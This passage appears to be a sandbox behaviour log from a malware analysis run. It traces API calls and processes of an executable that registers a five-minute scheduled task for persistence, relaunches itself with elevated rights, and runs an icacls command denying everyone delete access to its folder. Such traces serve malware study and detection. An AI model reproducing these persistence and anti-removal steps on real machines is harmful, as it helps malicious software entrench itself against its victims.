(in: This=0x6efef0, Path="\\", ppFolder=0x18d684 | out: ppFolder=0x18d684*=0x6eff58) returned 0x0 [0112.478] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x756970 | out: hHeap=0x6f0000) returned 1 [0112.478] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x756970 [0112.478] ITaskFolder:DeleteTask (This=0x6eff58, Name="Time Trigger Task", flags=0) returned 0x80070002 [0112.479] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x756970 | out: hHeap=0x6f0000) returned 1 [0112.479] TaskScheduler:ITaskService:NewTask (in: This=0x6efef0, flags=0x0, ppDefinition=0x18d688 | out: ppDefinition=0x18d688*=0x2a10b00) returned 0x0 [0112.483] TaskScheduler:IUnknown:Release (This=0x6efef0) returned 0x1 [0112.483] ITaskDefinition:get_RegistrationInfo (in: This=0x2a10b00, ppRegistrationInfo=0x18d65c | out: ppRegistrationInfo=0x18d65c*=0x2a10b78) returned 0x0 [0112.483] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x7569a0 [0112.483] IRegistrationInfo:put_Author (This=0x2a10b78, Author="Author Name") returned 0x0 [0112.483] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7569a0 | out: hHeap=0x6f0000) returned 1 [0112.483] IUnknown:Release (This=0x2a10b78) returned 0x1 [0112.483] ITaskDefinition:get_Principal (in: This=0x2a10b00, ppPrincipal=0x18d664 | out: ppPrincipal=0x18d664*=0x2a10d08) returned 0x0 [0112.483] IPrincipal:put_LogonType (This=0x2a10d08, LogonType=3) returned 0x0 [0112.483] IUnknown:Release (This=0x2a10d08) returned 0x1 [0112.483] ITaskDefinition:get_Settings (in: This=0x2a10b00, ppSettings=0x18d66c | out: ppSettings=0x18d66c*=0x2a10c28) returned 0x0 [0112.484] ITaskSettings:put_StartWhenAvailable (This=0x2a10c28, StartWhenAvailable=1) returned 0x0 [0112.484] IUnknown:Release (This=0x2a10c28) returned 0x1 [0112.484] ITaskSettings:get_IdleSettings (in: This=0x2a10c28, ppIdleSettings=0x18d650 | out: ppIdleSettings=0x18d650*=0x2a10c98) returned 0x0 [0112.484] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x7569a0 [0112.484] IIdleSettings:put_WaitTimeout (This=0x2a10c98, WaitTimeout="PT5M") returned 0x0 [0112.484] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7569a0 | out: hHeap=0x6f0000) returned 1 [0112.484] IUnknown:Release (This=0x2a10c98) returned 0x1 [0112.484] ITaskDefinition:get_Triggers (in: This=0x2a10b00, ppTriggers=0x18d64c | out: ppTriggers=0x18d64c*=0x2a10be8) returned 0x0 [0112.484] ITriggerCollection:Create (in: This=0x2a10be8, Type=1, ppTrigger=0x18d658 | out: ppTrigger=0x18d658*=0x2a10d68) returned 0x0 [0112.485] IUnknown:Release (This=0x2a10be8) returned 0x1 [0112.485] IUnknown:QueryInterface (in: This=0x2a10d68, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18d674 | out: ppvObject=0x18d674*=0x2a10d68) returned 0x0 [0112.485] IUnknown:Release (This=0x2a10d68) returned 0x2 [0112.485] ITrigger:get_Repetition (in: This=0x2a10d68, ppRepeat=0x18d660 | out: ppRepeat=0x18d660*=0x2a10db8) returned 0x0 [0112.485] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x7569a0 [0112.485] IRepetitionPattern:put_Interval (This=0x2a10db8, Interval="PT5M") returned 0x0 [0112.485] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7569a0 | out: hHeap=0x6f0000) returned 1 [0112.485] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x7569a0 [0112.485] IRepetitionPattern:put_Duration (This=0x2a10db8, Duration="") returned 0x0 [0112.487] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7569a0 | out: hHeap=0x6f0000) returned 1 [0112.488] ITrigger:put_Repetition (This=0x2a10d68, Repetition=0x2a10db8) returned 0x0 [0112.488] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x7569a0 [0112.488] ITrigger:put_Id (This=0x2a10d68, Id="Trigger1") returned 0x0 [0112.488] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7569a0 | out: hHeap=0x6f0000) returned 1 [0112.488] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x7569a0 [0112.488] ITrigger:put_EndBoundary (This=0x2a10d68, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0112.488] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7569a0 | out: hHeap=0x6f0000) returned 1 [0112.488] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d134 | out: lpSystemTimeAsFileTime=0x18d134*(dwLowDateTime=0xe2efd720, dwHighDateTime=0x1d5ff3b)) [0112.501] GetLastError () returned 0x0 [0112.513] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x24) returned 0x719d68 [0112.525] GetLastError () returned 0x0 [0112.531] GetLastError () returned 0x0 [0112.537] GetLastError () returned 0x0 [0112.543] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0112.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d09c | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d09c) returned 26 [0112.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d09c | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d09c) returned 26 [0112.608] GetLastError () returned 0x0 [0112.608] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x24) returned 0x719d98 [0112.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x719d98, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0112.608] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa0) returned 0x74e1f8 [0112.608] GetLastError () returned 0x0 [0112.608] ITrigger:put_StartBoundary (This=0x2a10d68, StartBoundary="2020-03-21T15:51:04") returned 0x0 [0112.608] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7569d0 | out: hHeap=0x6f0000) returned 1 [0112.608] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7587f0 | out: hHeap=0x6f0000) returned 1 [0112.608] IUnknown:Release (This=0x2a10d68) returned 0x1 [0112.608] ITaskDefinition:get_Actions (in: This=0x2a10b00, ppActions=0x18d668 | out: ppActions=0x18d668*=0x6eff88) returned 0x0 [0112.608] IActionCollection:Create (in: This=0x6eff88, Type=0, ppAction=0x18d654 | out: ppAction=0x18d654*=0x2a10df0) returned 0x0 [0112.609] IUnknown:Release (This=0x6eff88) returned 0x1 [0112.609] IUnknown:QueryInterface (in: This=0x2a10df0, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18d670 | out: ppvObject=0x18d670*=0x2a10df0) returned 0x0 [0112.609] IUnknown:Release (This=0x2a10df0) returned 0x2 [0112.609] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x7569d0 [0112.609] IExecAction:put_Path (This=0x2a10df0, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\\1A3E.TMP.EXE.exe") returned 0x0 [0112.609] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7569d0 | out: hHeap=0x6f0000) returned 1 [0112.609] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x7569d0 [0112.610] IExecAction:put_Arguments (This=0x2a10df0, Arguments="--Task") returned 0x0 [0112.610] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7569d0 | out: hHeap=0x6f0000) returned 1 [0112.610] IUnknown:Release (This=0x2a10df0) returned 0x1 [0112.610] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x7569d0 [0112.610] ITaskFolder:RegisterTaskDefinition (in: This=0x6eff58, Path="Time Trigger Task", pDefinition=0x2a10b00, flags=6, UserId=0x18d110*(varType=0x0, wReserved1=0x75, wReserved2=0xd624, wReserved3=0x18, varVal1=0x420cab, varVal2=0x6f0000), password=0x18d120*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), LogonType=3, sddl=0x18d134*(varType=0x8, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1="", varVal2=0xd8), ppTask=0x18d63c | out: ppTask=0x18d63c*=0x2a10e60) returned 0x0 [0112.810] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7569d0 | out: hHeap=0x6f0000) returned 1 [0112.810] TaskScheduler:IUnknown:Release (This=0x6eff58) returned 0x0 [0112.810] TaskScheduler:IUnknown:Release (This=0x2a10b00) returned 0x0 [0112.810] IUnknown:Release (This=0x2a10e60) returned 0x0 [0112.810] CoUninitialize () [0112.811] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x751790 | out: hHeap=0x6f0000) returned 1 [0112.811] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x751508 | out: hHeap=0x6f0000) returned 1 [0112.811] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x751430 | out: hHeap=0x6f0000) returned 1 [0112.811] GetVersion () returned 0x1db10106 [0112.811] lstrcpyW (in: lpString1=0x18daa0, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0112.811] lstrcatW (in: lpString1="--Admin", lpString2=" IsNotAutoStart" | out: lpString1="--Admin IsNotAutoStart") returned="--Admin IsNotAutoStart" [0112.811] lstrcatW (in: lpString1="--Admin IsNotAutoStart", lpString2=" IsNotTask" | out: lpString1="--Admin IsNotAutoStart IsNotTask") returned="--Admin IsNotAutoStart IsNotTask" [0112.812] ShellExecuteExW (in: pExecInfo=0x18d864*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18d864*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0113.004] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71e790 | out: hHeap=0x6f0000) returned 1 [0113.004] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x751358 | out: hHeap=0x6f0000) returned 1 [0113.004] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x74ca18 | out: hHeap=0x6f0000) returned 1 [0113.134] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71df60 | out: hHeap=0x6f0000) returned 1 [0113.134] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x70e6b0 | out: hHeap=0x6f0000) returned 1 [0113.134] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x754778 | out: hHeap=0x6f0000) returned 1 [0113.134] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x753e80 | out: hHeap=0x6f0000) returned 1 [0113.143] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x711498 | out: hHeap=0x6f0000) returned 1 [0113.199] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7105b0 | out: hHeap=0x6f0000) returned 1 [0113.199] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18eb2c | out: phModule=0x18eb2c) returned 0 [0113.199] ExitProcess (uExitCode=0x0) [0113.250] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x719d68 | out: hHeap=0x6f0000) returned 1 [0113.250] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x70f260 | out: hHeap=0x6f0000) returned 1 [0113.408] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 2 os_tid = 0x648 Thread: id = 3 os_tid = 0x600 Thread: id = 4 os_tid = 0x5e0 Thread: id = 5 os_tid = 0x6f4 Thread: id = 6 os_tid = 0x670 Thread: id = 7 os_tid = 0x70c Thread: id = 8 os_tid = 0x7e4 Thread: id = 23 os_tid = 0x304 Thread: id = 24 os_tid = 0x5cc Thread: id = 33 os_tid = 0xb90 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 9 os_tid = 0xb38 Thread: id = 10 os_tid = 0x768 Thread: id = 11 os_tid = 0x764 Thread: id = 12 os_tid = 0x758 Thread: id = 13 os_tid = 0x724 Thread: id = 14 os_tid = 0x718 Thread: id = 15 os_tid = 0x714 Thread: id = 16 os_tid = 0x630 Thread: id = 17 os_tid = 0x154 Thread: id = 18 os_tid = 0x150 Thread: id = 19 os_tid = 0x120 Thread: id = 20 os_tid = 0x124 Thread: id = 21 os_tid = 0x118 Thread: id = 22 os_tid = 0xf0 Thread: id = 35 os_tid = 0x344 Thread: id = 90 os_tid = 0x4e0 Thread: id = 91 os_tid = 0x760 Thread: id = 92 os_tid = 0x544 Thread: id = 126 os_tid = 0xb5c Thread: id = 127 os_tid = 0xa24 Thread: id = 128 os_tid = 0x9d4 Process: id = "3" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x4e6af000" os_pid = "0xae8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb0" cmd_line = "icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\e6fbab59-e809-4a2f-bfd3-cab0a2218b41\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 25 os_tid = 0xb80 Thread: id = 26 os_tid = 0xaec Process: id = "4" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x76a3f000" os_pid = "0x588" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "1" os_parent_pid = "0x370" cmd_line = "taskeng.exe {4568F795-B030-4E70-B052-419BC1469E0B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 27 os_tid = 0xb78 Thread: id = 28 os_tid = 0x5b4 Thread: id = 29 os_tid = 0x5b0 Thread: id = 30 os_tid = 0x59c Thread: id = 31 os_tid = 0x594 Thread: id = 32 os_tid = 0x58c Thread: id = 44 os_tid = 0xa7c Thread: id = 89 os_tid = 0x74c Process: id = "5" image_name = "1a3e.tmp.exe.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1a3e.tmp.exe.exe" page_root = "0x52158000" os_pid = "0xba8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 34 os_tid = 0xaf4 [0113.627] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xe37c4840, dwHighDateTime=0x1d5ff3b)) [0113.627] GetCurrentProcessId () returned 0xba8 [0113.627] GetCurrentThreadId () returned 0xaf4 [0113.627] GetTickCount () returned 0x115079f [0113.628] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=23352811401) returned 1 [0113.671] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x40768b)) [0113.672] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x680000 [0113.673] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.674] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0113.674] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0113.674] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0113.674] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0113.674] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.674] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.675] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.675] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.675] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.675] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.675] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.675] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.675] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.676] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.676] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.676] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.676] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.676] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.677] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.677] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0113.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x214) returned 0x6807d0 [0113.677] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.677] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0113.677] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.677] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0113.677] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0113.678] GetCurrentThreadId () returned 0xaf4 [0113.678] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0113.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x800) returned 0x6809f0 [0113.678] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0113.678] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0113.678] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0113.678] SetHandleCount (uNumber=0x20) returned 0x20 [0113.678] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe\" --Admin IsNotAutoStart IsNotTask" [0113.678] GetEnvironmentStringsW () returned 0x2d1d70* [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xaca) returned 0x6811f8 [0113.679] FreeEnvironmentStringsW (penv=0x2d1d70) returned 1 [0113.679] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4aadc0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1a3e.tmp.exe.exe")) returned 0x36 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc4) returned 0x681cd0 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x98) returned 0x681da0 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3e) returned 0x681e40 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x6c) returned 0x681e88 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x6e) returned 0x681f00 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x78) returned 0x681f78 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x62) returned 0x681ff8 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x2e) returned 0x682068 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x48) returned 0x6820a0 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x28) returned 0x6820f0 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1a) returned 0x682120 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4a) returned 0x682148 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x72) returned 0x6821a0 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x30) returned 0x682220 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x2e) returned 0x682258 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1c) returned 0x682290 [0113.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xd2) returned 0x6822b8 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x7c) returned 0x682398 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x36) returned 0x682420 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3a) returned 0x682460 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x90) returned 0x6824a8 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x24) returned 0x682540 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x30) returned 0x682570 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x36) returned 0x6825a8 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x48) returned 0x6825e8 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x52) returned 0x682638 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3c) returned 0x682698 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x82) returned 0x6826e0 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x2e) returned 0x682770 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x1e) returned 0x6827a8 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x2c) returned 0x6827d0 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x54) returned 0x682808 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x52) returned 0x682868 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x2a) returned 0x6828c8 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x3c) returned 0x682900 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x54) returned 0x682948 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x24) returned 0x6829a8 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x30) returned 0x6829d8 [0113.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x8c) returned 0x682a10 [0113.680] HeapFree (in: 